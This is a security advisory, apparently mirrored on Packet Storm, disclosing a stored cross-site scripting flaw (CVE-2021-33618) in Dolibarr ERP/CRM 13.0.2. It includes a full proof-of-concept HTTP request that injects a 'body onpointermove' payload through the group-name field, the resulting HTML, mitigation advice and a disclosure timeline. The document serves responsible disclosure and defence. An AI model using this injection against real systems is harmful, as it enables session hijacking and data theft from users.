what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Dolibarr ERP / CRM 13.0.2 Cross Site Scripting

Dolibarr ERP / CRM 13.0.2 Cross Site Scripting
Posted Nov 10, 2021
Authored by Nick Decker | Site trovent.io

Dolibarr ERP and CRM version 13.0.2 suffer from a persistent cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2021-33618
SHA-256 | 6afececee15157d0a85c82e9913e53a3fb7f9193f24e64dca4bef906cb032beb

Dolibarr ERP / CRM 13.0.2 Cross Site Scripting

Change Mirror Download
# Trovent Security Advisory 2105-02 #
#####################################


Stored cross-site scripting in Dolibarr ERP & CRM
#################################################


Overview
########

Advisory ID: TRSA-2105-02
Advisory version: 1.0
Advisory status: Public
Advisory URL: https://trovent.io/security-advisory-2105-02
Affected product: Dolibarr ERP & CRM
Tested versions: Dolibarr 13.0.2
Vendor: Dolibarr foundation, https://www.dolibarr.org
Credits: Trovent Security GmbH, Nick Decker


Detailed description
####################

Trovent Security GmbH discovered that the Dolibarr application does not escape
"greater than" and "smaller than" characters if they are reflected in one of the
small pop-up windows with details of the object.
This allows an attacker to add certain custom HTML tags and attributes.
In our PoC we used a "body" tag in conjunction with an "onpointermove" attribute
to achieve constant execution of the inserted JavaScript code.

Severity: Critical
CVSS Score: 9.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H)
CWE ID: CWE-79
CVE ID: CVE-2021-33618


Proof of concept
################

This is the HTTP request to change the group name:

REQUEST:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


POST /user/group/card.php HTTP/1.1
Host: 10.11.9.80
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 -securitytest-for-dolibarr
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------329097076628264922392755475836
Content-Length: 950
Origin: http://10.11.9.80
Connection: close
Referer: http://10.11.9.80/user/group/card.php?id=1&action=edit&token=4726524fe505b027519a535e08c11fb6
Cookie: PHPSESSID=8s2jl8fhmbm5th8r4baasak1q2; DOLSESSID_736206a821984837877b8a6a901910d2=4jkf7smp24evfm3vvnnunj8jaq
Upgrade-Insecure-Requests: 1

- -----------------------------329097076628264922392755475836
Content-Disposition: form-data; name="token"

6585d0838337cafddc3387fcccbe9d91
- -----------------------------329097076628264922392755475836
Content-Disposition: form-data; name="action"

update
- -----------------------------329097076628264922392755475836
Content-Disposition: form-data; name="backtopage"

/user/group/card.php?id=1
- -----------------------------329097076628264922392755475836
Content-Disposition: form-data; name="id"

1
- -----------------------------329097076628264922392755475836
Content-Disposition: form-data; name="nom"

Trovent<<body onpointermove=alert(1) <>test
- -----------------------------329097076628264922392755475836
Content-Disposition: form-data; name="note"


- -----------------------------329097076628264922392755475836
Content-Disposition: form-data; name="save"

Save
- -----------------------------329097076628264922392755475836--


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




CODE:

The HTML code of the site then includes the attribute in its body tag:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


<body id="mainbody" class="sidebar-collapse" <="" onpointermove="alert(1)" style="margin-bottom: 26px;">

<!-- Start top horizontal -->
<div class="side-nav-vert"><div id="id-top"><div id="tmenu_tooltip" class="tmenu">
[...]


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Solution / Workaround
#####################

To mitigate this vulnerability, we recommend to always escape the user input
regardless of where it is reflected. Additionally we recommend to blacklist all
HTML tags and attributes.

Fixed in Dolibarr version 14.0.0, verified by Trovent.


History
#######

2021-05-25: Vulnerability found
2021-05-28: CVE ID requested & received
2021-05-31: Vendor contacted
2021-06-02: Vendor reported the vulnerability as fixed
2021-11-08: Add information about fixed version
2021-11-10: Advisory published
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close